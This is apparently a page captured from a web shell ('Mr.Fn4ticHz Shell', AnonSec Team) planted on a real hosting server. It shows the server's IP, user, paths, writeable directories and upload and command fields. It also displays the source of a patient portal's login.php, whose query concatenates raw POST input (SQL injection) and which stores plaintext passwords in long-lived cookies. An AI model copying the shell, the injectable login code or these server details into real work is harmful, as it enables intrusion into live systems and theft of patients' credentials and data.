Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.191.139.169
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/patient.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/patient.easenup.in/login.php
<?php
session_start();


if(isset($_POST['login']))
{
	
 extract($_POST);
    include 'db/dbcon.php';
    $sql=mysqli_query($conn,"SELECT * FROM `site_users` where numbers='".$_POST['umobile']."' and password='".$_POST['password']."'");
    $row  = mysqli_fetch_array($sql);
    if(is_array($row))
    {
        $_SESSION["userno"] = $row['userno'];
        $_SESSION["uname"]=$row['uname'];
        $_SESSION["usertype"]=$row['usertype'];
        $_SESSION["numbers"]=$row['numbers']; 
        if($_SESSION["usertype"]=="Patient" && $_SESSION["userno"]==$row['userno']){
      $_SESSION['uname']=$row['uname'];
      $_SESSION['userno']=$row['userno'];
      $_SESSION['usertype']=$row['usertype'];
      
      echo"<script>alert('Login Successfull..'); </script>";
      echo "<script>window.location.assign('dashboard.php?id=$_SESSION[userno]')</script>";
    } else if($_SESSION["usertype"]=="Family" && $_SESSION["userno"]==$row['userno']){
     $_SESSION['uname']=$row['uname'];
      $_SESSION['userno']=$row['userno'];
      $_SESSION['usertype']=$row['usertype'];
      echo"<script>alert('Login Successfull..'); </script>";
      echo "<script>window.location.assign('family.php?id=$_SESSION[userno]')</script>";
    } 
    }
    else
    {
        echo "<script>alert('Invalid Email ID/Password..'); </script>";
    }
    
   if(isset($_POST["chk"]))
      {
        $user=$_POST['umobile'];
        $upass=$_POST['password'];
        setcookie ("umobile",$user,time()+ (10 * 365 * 24 * 60 * 60));
        setcookie ("password",$upass,time()+ (10 * 365 * 24 * 60 * 60));
      }else{
        setcookie ("umobile","",time()+ (10 * 365 * 24 * 60 * 60));
        setcookie ("password","",time()+ (10 * 365 * 24 * 60 * 60));
      }  
    
}
$checkedStatus="";
    $cookieUser="";
    $cookiePass="";
    #Get UserName and Password from Cookies 
    if(isset($_COOKIE["umobile"]) && isset($_COOKIE["password"])){
      $cookieUser=$_COOKIE["umobile"];
      $cookiePass=$_COOKIE["password"];
      $checkedStatus="checked";
    }
?>
<!DOCTYPE html>
<html lang="en">
	<head>
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
		<meta charset="utf-8" />
		<title>Login</title>

		<meta name="description" content="User login page" />
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0" />

		<!-- bootstrap & fontawesome -->
		<link rel="stylesheet" href="assets/css/bootstrap.min.css" />
		<link rel="stylesheet" href="assets/font-awesome/4.5.0/css/font-awesome.min.css" />

		<!-- text fonts -->
		<link rel="stylesheet" href="assets/css/fonts.googleapis.com.css" />

		<!-- ace styles -->
		<link rel="stylesheet" href="assets/css/ace.min.css" />

		<!--[if lte IE 9]>
			<link rel="stylesheet" href="assets/css/ace-part2.min.css" />
		<![endif]-->
		<link rel="stylesheet" href="assets/css/ace-rtl.min.css" />

		<!--[if lte IE 9]>
		  <link rel="stylesheet" href="assets/css/ace-ie.min.css" />
		<![endif]-->

		<!-- HTML5shiv and Respond.js for IE8 to support HTML5 elements and media queries -->

		<!--[if lte IE 8]>
		<script src="assets/js/html5shiv.min.js"></script>
		<script src="assets/js/respond.min.js"></script>
		<![endif]-->
	</head>

	<body class="login-layout">
<div class="main-container">
<div class="main-content">
<div class="row">
<div class="col-sm-10 col-sm-offset-1">
<div class="login-container">
<div class="center">
<h1>

<center><img src='assets/images/logo/logo.png' class='img-responsive' alt='logo' ></center>
</h1>

</div>

<div class="space-6"></div>

<div class="position-relative">
<div id="login-box" class="login-box visible widget-box no-border">
<div class="widget-body">
<div class="widget-main">
<h4 class="header blue lighter bigger">
<i class="ace-icon fa fa-user-md green"></i>
Please Enter Your Information
</h4>

<div class="space-6"></div>

<form  method="POST" action='<?php echo $_SERVER["REQUEST_URI"]; ?>'>
<fieldset>
<label class="block clearfix">
<span class="block input-icon input-icon-right">
<input type="text" class="form-control" placeholder="Mobile Number" name='umobile' value='<?php echo $cookieUser;?>' required />
<i class="ace-icon fa fa-phone"></i>
</span>
</label>

<label class="block clearfix">
<span class="block input-icon input-icon-right">
<input type="password" class="form-control" placeholder="Password" name='password' value='<?php echo $cookiePass;?>' required/>
<i class="ace-icon fa fa-lock"></i>
</span>
</label>

<div class="space"></div>

<div class="clearfix">

<label class="inline">
<input  type='checkbox'  name='chk' class="ace" <?php echo $checkedStatus;?>/>
<span class="lbl"> Remember Me</span>
</label>

<button type="submit" class="width-35 pull-right btn btn-sm btn-primary" name="login">
<i class="ace-icon fa fa-key"></i>
<span class="bigger-110">Login</span>
</button>
</div>

<div class="space-4"></div>
</fieldset>
</form>


</div><!-- /.widget-main -->

<div class="toolbar clearfix">
<div>
<a href="ForgetPwd.php"  class="forgot-password-link">
<i class="ace-icon fa fa-arrow-left"></i>
I forgot my password
</a>
</div>

<div>
<a href="RegisterNow.php"  class="user-signup-link">
I want to register
<i class="ace-icon fa fa-arrow-right"></i>
</a>
</div>
</div>
</div><!-- /.widget-body -->
</div><!-- /.login-box -->

<div id="forgot-box" class="forgot-box widget-box no-border">
<div class="widget-body">
<div class="widget-main">
<h4 class="header red lighter bigger">
<i class="ace-icon fa fa-key"></i>
Retrieve Password
</h4>

<div class="space-6"></div>
<p>
Enter your email and to receive instructions
</p>

<form>
<fieldset>
<label class="block clearfix">
<span class="block input-icon input-icon-right">
<input type="email" class="form-control" placeholder="Email" />
<i class="ace-icon fa fa-envelope"></i>
</span>
</label>

<div class="clearfix">
<button type="button" class="width-35 pull-right btn btn-sm btn-danger">
<i class="ace-icon fa fa-lightbulb-o"></i>
<span class="bigger-110">Send Me!</span>
</button>
</div>
</fieldset>
</form>
</div><!-- /.widget-main -->

<div class="toolbar center">
<a href="#" data-target="#login-box" class="back-to-login-link">
Back to login
<i class="ace-icon fa fa-arrow-right"></i>
</a>
</div>
</div><!-- /.widget-body -->
</div><!-- /.forgot-box -->


</div><!-- /.position-relative -->


</div>
</div><!-- /.col -->
</div><!-- /.row -->
</div><!-- /.main-content -->
</div><!-- /.main-container -->

		<!-- basic scripts -->

		<!--[if !IE]> -->
		<script src="assets/js/jquery-2.1.4.min.js"></script>

		<!-- <![endif]-->

		<!--[if IE]>
<script src="assets/js/jquery-1.11.3.min.js"></script>
<![endif]-->
		<script type="text/javascript">
			if('ontouchstart' in document.documentElement) document.write("<script src='assets/js/jquery.mobile.custom.min.js'>"+"<"+"/script>");
		</script>

		<!-- inline scripts related to this page -->
		<script type="text/javascript">
			jQuery(function($) {
			 $(document).on('click', '.toolbar a[data-target]', function(e) {
				e.preventDefault();
				var target = $(this).data('target');
				$('.widget-box.visible').removeClass('visible');//hide others
				$(target).addClass('visible');//show target
			 });
			});
			
			
			
			//you don't need this, just used for changing background
			jQuery(function($) {
			 $('#btn-login-dark').on('click', function(e) {
				$('body').attr('class', 'login-layout');
				$('#id-text2').attr('class', 'white');
				$('#id-company-text').attr('class', 'blue');
				
				e.preventDefault();
			 });
			 $('#btn-login-light').on('click', function(e) {
				$('body').attr('class', 'login-layout light-login');
				$('#id-text2').attr('class', 'grey');
				$('#id-company-text').attr('class', 'blue');
				
				e.preventDefault();
			 });
			 $('#btn-login-blur').on('click', function(e) {
				$('body').attr('class', 'login-layout blur-login');
				$('#id-text2').attr('class', 'white');
				$('#id-company-text').attr('class', 'light-blue');
				
				e.preventDefault();
			 });
			 
			});
		</script>
	</body>
</html>

Anon7 - 2022
AnonSec Team